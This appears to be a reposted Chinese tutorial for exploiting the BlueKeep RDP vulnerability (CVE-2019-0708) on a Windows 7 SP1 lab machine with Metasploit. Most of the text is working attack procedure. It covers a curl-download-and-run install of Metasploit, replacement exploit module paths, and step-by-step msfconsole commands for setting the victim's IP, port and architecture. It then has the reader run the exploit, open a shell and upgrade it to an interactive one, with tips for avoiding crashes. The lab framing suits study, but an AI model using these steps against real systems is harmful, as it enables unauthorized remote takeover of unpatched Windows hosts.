漏洞环境
使用VMware Fusion安装Windows7 SP1模拟测试机
Windows7 SP1下载链接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
安全工具准备
1.使用如下命令一键安装metasploit-framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2.下载Reference(文末)中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
测试命令
使用msfconsole
进入metasploit-framework
进入以后使用reload_all
重新加载0708rdp利用模块
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
启用0708RDP测试模块
使用info
查看工具相关信息以及设置
可见关键设置主要为RHOSTS
\ RPORT
\ target
使用set RHOSTS 测试机IP
设置受害机IP
使用set RPORT 测试害机PORT
设置受害机RDP端口号
使用set target ID数字(可选为0-4)
设置测试机机器架构
这里我们使用的是VMware Fusion,那么target 3满足条件
使用exploit
开始攻击,等待建立连接
建立连接以后,使用shell
获得shell,再使用python
获得交互式shell
随即完成攻击,成功拿到测试主机权限
注意事项
1.靶机建议重新安装一台win7sp1,要允许任何人远程桌面连接
2.msf要升级到5
3.要替换文件为我文章里面的文件,全部都要替换。路径的话 我给的是全新安装msf的路径,你可以差不多find找找嘛
4.网络层问题要注意,比如:你的win7sp1在公网,你的msf在内网,你怎么打嘛?
5.target是主机架构选择的意思,一定要选对,vm装的win7sp1话,先试2,再试3,建议试一次重启靶机一次。选错架构会导致蓝屏、利用失败等问题
公众号回复:安全工具,获得下载相关安全工具
本文转自公众号:安全祖师爷
近年来,漏洞问题频发;你还不准备学点漏洞知识吗?扫码,抓住学习契机!
别忘了投稿哦
大家有好的技术原创文章
欢迎投稿至邮箱:[email protected]
合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦
有才能的你快来投稿吧!
了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!